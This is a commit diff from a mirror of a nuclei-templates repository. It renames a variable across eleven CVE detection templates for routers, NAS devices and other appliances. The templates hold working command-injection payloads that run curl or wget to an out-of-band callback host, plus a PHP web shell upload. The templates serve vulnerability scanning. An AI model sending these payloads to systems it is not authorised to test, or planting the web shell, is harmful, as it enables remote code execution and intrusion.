daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

update variable name

patch-1
Prince Chaddha 2023-03-29 19:24:19 +05:30
parent a037cb0204
commit e9b055e325
11 changed files with 39 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
cves/2018/CVE-2018-10562.yaml
View File

@ -18,7 +18,7 @@ info:
tags: cve,cve2018,dasan,gpon,rce,oast,kev
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
@ -26,13 +26,13 @@ requests:
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: {{Hostname}}
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;busybox wget http://{{interactsh-url}}&ipv=0
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0
- |
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: {{Hostname}}
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;wget http://{{interactsh-url}}&ipv=0
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0
stop-at-first-match: true
matchers-condition: and
@ -45,6 +45,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/05/12

8
cves/2018/CVE-2018-10818.yaml
View File

@ -14,7 +14,7 @@ info:
tags: cve,cve2018,lg-nas,rce,oast,injection
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
@ -23,14 +23,14 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'
&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
- |
POST /en/php/usb_sync.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'
&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
stop-at-first-match: true
matchers-condition: and
@ -43,6 +43,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/04/26

6
cves/2020/CVE-2020-17456.yaml
View File

@ -17,7 +17,7 @@ info:
tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
@ -34,7 +34,7 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
cookie-reuse: true
matchers-condition: and
@ -47,7 +47,7 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
- type: word
part: header

8
cves/2020/CVE-2020-25506.yaml
View File

@ -17,7 +17,7 @@ info:
tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
@ -26,10 +26,10 @@ requests:
Host: {{Hostname}}
Accept: */*
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'`
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`
- |
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` HTTP/1.1
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1
Host: {{Hostname}}
Accept: */*
@ -43,6 +43,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/03/27

8
cves/2020/CVE-2020-28188.yaml
View File

@ -18,16 +18,16 @@ info:
tags: cve,cve2020,terramaster,rce,oast,mirai,unauth
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
- |
GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1
GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
Host: {{Hostname}}
- |
GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1
GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
@ -41,6 +41,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/03/27

6
cves/2020/CVE-2020-28871.yaml
View File

@ -17,7 +17,7 @@ info:
tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
@ -37,7 +37,7 @@ requests:
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
Content-Type: image/gif
GIF89a213213123<?php shell_exec("curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'");
GIF89a213213123<?php shell_exec("curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'");
-----------------------------31046105003900160576454225745--
@ -55,6 +55,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/03/27

8
cves/2021/CVE-2021-1497.yaml
View File

@ -21,7 +21,7 @@ info:
tags: cisco,rce,oast,kev,packetstorm,cve,cve2021
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
@ -31,7 +31,7 @@ requests:
Accept: */*
Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'\");print(crypt.crypt(\"')}}
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\");print(crypt.crypt(\"')}}
- |
POST /auth HTTP/1.1
@ -39,7 +39,7 @@ requests:
Accept: */*
Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'\");print(crypt.crypt(\"')}}
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\");print(crypt.crypt(\"')}}
matchers-condition: and
matchers:
@ -51,6 +51,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/04/29

6
cves/2021/CVE-2021-20038.yaml
View File

@ -17,12 +17,12 @@ info:
tags: cve,cve2021,overflow,rce,sonicwall,kev
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
- |
GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'};?{{repeat("A", 518)}} HTTP/1.1
GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat("A", 518)}} HTTP/1.1
Host: {{Hostname}}
attack: clusterbomb
@ -43,6 +43,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/04/29

8
cves/2021/CVE-2021-21881.yaml
View File

@ -16,7 +16,7 @@ info:
tags: cve,cve2021,lantronix,rce,oast,cisco
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
@ -26,7 +26,7 @@ requests:
Authorization: Basic dXNlcjp1c2Vy
Content-Type: application/x-www-form-urlencoded
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' #
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
- |
POST / HTTP/1.1
@ -34,7 +34,7 @@ requests:
Authorization: Basic YWRtaW46UEFTUw==
Content-Type: application/x-www-form-urlencoded
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' #
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
stop-at-first-match: true
matchers-condition: and
@ -47,6 +47,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/05/05

6
cves/2021/CVE-2021-36356.yaml
View File

@ -18,7 +18,7 @@ info:
tags: viaware,cve,cve2021,kramer,edb,rce
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
@ -30,7 +30,7 @@ requests:
radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
- |
GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'")}' HTTP/1.1
GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
@ -43,6 +43,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/05/18

6
cves/2021/CVE-2021-41653.yaml
View File

@ -18,7 +18,7 @@ info:
tags: cve,cve2021,tplink,rce,router
variables:
base: '{{rand_base(6)}}'
useragent: '{{rand_base(6)}}'
requests:
- raw:
@ -33,7 +33,7 @@ requests:
dataBlockSize=64
timeout=1
numberOfRepetitions=4
host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{base}}')
host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested
@ -56,6 +56,6 @@ requests:
- type: word
part: interactsh_request
words:
- "User-Agent: {{base}}"
- "User-Agent: {{useragent}}"
# Enhanced by mp on 2022/02/27